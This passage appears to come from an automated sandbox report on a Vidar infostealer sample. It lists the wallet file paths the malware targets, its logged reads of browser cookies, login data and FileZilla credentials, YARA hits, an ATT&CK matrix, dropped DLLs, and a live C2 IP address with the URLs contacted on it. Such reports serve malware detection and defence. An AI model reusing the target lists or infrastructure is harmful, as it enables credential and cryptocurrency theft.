Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Spice.pif	Binary or memory string: WIN_81
Source: Spice.pif	Binary or memory string: WIN_XP
Source: Spice.pif	Binary or memory string: WIN_XPe
Source: Spice.pif	Binary or memory string: WIN_VISTA
Source: Spice.pif	Binary or memory string: WIN_7
Source: Spice.pif	Binary or memory string: WIN_8
Source: Spice.pif.2.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match

File source: Process Memory Space: Spice.pif PID: 752, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 11.2.Spice.pif.4810000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Spice.pif PID: 752, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EE696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		11_2_00EE696E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EE6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		11_2_00EE6E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 Software Packing	NTDS	26 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	4 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
0dN59ZIkEM.exe	47%	ReversingLabs	Win32.Spyware.Vidar
0dN59ZIkEM.exe	42%	Virustotal		Browse
0dN59ZIkEM.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	100%	Joe Sandbox ML
C:\ProgramData\HCAEGCBFHJDG\freebl3.dll	0%	ReversingLabs
C:\ProgramData\HCAEGCBFHJDG\freebl3.dll	0%	Virustotal	Browse
C:\ProgramData\HCAEGCBFHJDG\mozglue.dll	0%	ReversingLabs
C:\ProgramData\HCAEGCBFHJDG\mozglue.dll	0%	Virustotal	Browse
C:\ProgramData\HCAEGCBFHJDG\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\HCAEGCBFHJDG\msvcp140.dll	0%	Virustotal	Browse
C:\ProgramData\HCAEGCBFHJDG\nss3.dll	0%	ReversingLabs
C:\ProgramData\HCAEGCBFHJDG\nss3.dll	0%	Virustotal	Browse
C:\ProgramData\HCAEGCBFHJDG\softokn3.dll	0%	ReversingLabs
C:\ProgramData\HCAEGCBFHJDG\softokn3.dll	0%	Virustotal	Browse
C:\ProgramData\HCAEGCBFHJDG\vcruntime140.dll	0%	ReversingLabs
C:\ProgramData\HCAEGCBFHJDG\vcruntime140.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	7%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	3%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqln[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://mozilla.org0/	0%	URL Reputation	safe
https://37.27.87.155/sqln.dll	0%	Avira URL Cloud	safe
https://37.27.87.155/GHDGDAKECAKJEHCGDAA	0%	Avira URL Cloud	safe
https://www.gstatic.cn/recaptcha/	0%	Avira URL Cloud	safe
https://37.27.87.155ta	0%	Avira URL Cloud	safe
https://37.27.87.155/ramData	0%	Avira URL Cloud	safe
https://recaptcha.net	0%	URL Reputation	safe
https://37.27.87.155/nss3.dll	0%	Avira URL Cloud	safe
https://37.27.87.155/softokn3.dll	0%	Avira URL Cloud	safe
https://37.27.87.155/sqln.dll	12%	Virustotal		Browse
https://www.gstatic.cn/recaptcha/	0%	Virustotal		Browse
https://37.27.87.155/vcruntime140.dll	0%	Avira URL Cloud	safe
https://37.27.87.155HDHIDGIEBGIJEHIJKFIIition:	0%	Avira URL Cloud	safe
https://37.27.87.155AAKKE	0%	Avira URL Cloud	safe
https://37.27.87.155VWXYZ12345678900)	0%	Avira URL Cloud	safe
https://37.27.87.155/msvcp140.dll	0%	Avira URL Cloud	safe
https://37.27.87.155/	0%	Avira URL Cloud	safe
https://37.27.87.155/freebl3.dll	0%	Avira URL Cloud	safe
https://37.27.87.155/;	0%	Avira URL Cloud	safe
https://37.27.87.155/freebl3.dll(e	0%	Avira URL Cloud	safe
https://37.27.87.155CAKJE	0%	Avira URL Cloud	safe
https://37.27.87.155/o	0%	Avira URL Cloud	safe
https://37.27.87.155/	11%	Virustotal		Browse
https://37.27.87.155/p	0%	Avira URL Cloud	safe
https://37.27.87.155KKKEH	0%	Avira URL Cloud	safe
https://37.27.87.155	0%	Avira URL Cloud	safe
https://37.27.87.155/mozglue.dll	0%	Avira URL Cloud	safe
https://37.27.87.155FBGIIIEBGDGDAKJKKKEBition:	0%	Avira URL Cloud	safe
https://37.27.87.155	11%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
steamcommunity.com	23.7.115.52	true	false		high
ihIVTwGgMFMSkvPLDBTLteOUVB.ihIVTwGgMFMSkvPLDBTLteOUVB	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://37.27.87.155/sqln.dll	false	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://37.27.87.155/softokn3.dll	false	Avira URL Cloud: safe	unknown
https://37.27.87.155/nss3.dll	false	Avira URL Cloud: safe	unknown
https://37.27.87.155/vcruntime140.dll	false	Avira URL Cloud: safe	unknown
https://37.27.87.155/msvcp140.dll	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199677575543	false		high
https://37.27.87.155/	false	11%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://37.27.87.155/freebl3.dll	false	Avira URL Cloud: safe	unknown
https://37.27.87.155/mozglue.dll	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	DGDAEHCB.11.dr	false		high
https://duckduckgo.com/ac/?q=	DGDAEHCB.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.j	Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp	false		high
https://37.27.87.155ta	Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://steamcommunity.com/?subsection=broadcasts	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://steamcommunity.com/profiles/76561199677575543/badges	Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://store.steampowered.com/subscriber_agreement/	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://www.gstatic.cn/recaptcha/	Spice.pif, 0000000B.00000002.2621187844.0000000001790000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.autoitscript.com/autoit3/	0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&	Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://37.27.87.155/GHDGDAKECAKJEHCGDAA	Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE	Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://37.27.87.155/ramData	Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.valvesoftware.com/legal.htm	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://steamcommunity.com/profiles/76561199677575543/inventory/	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
http://www.autoitscript.com/autoit3/J	0dN59ZIkEM.exe, 00000000.00000003.1354277819.000000000282B000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000000.1408696187.0000000000F39000.00000002.00000001.01000000.00000005.sdmp, Factor.0.dr, Spice.pif.2.dr	false		high
https://steamcommunity.com/o	Spice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue[1].dll.11.dr, mozglue.dll.11.dr	false		high
https://mozilla.org0/	softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
http://store.steampowered.com/privacy_agreement/	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
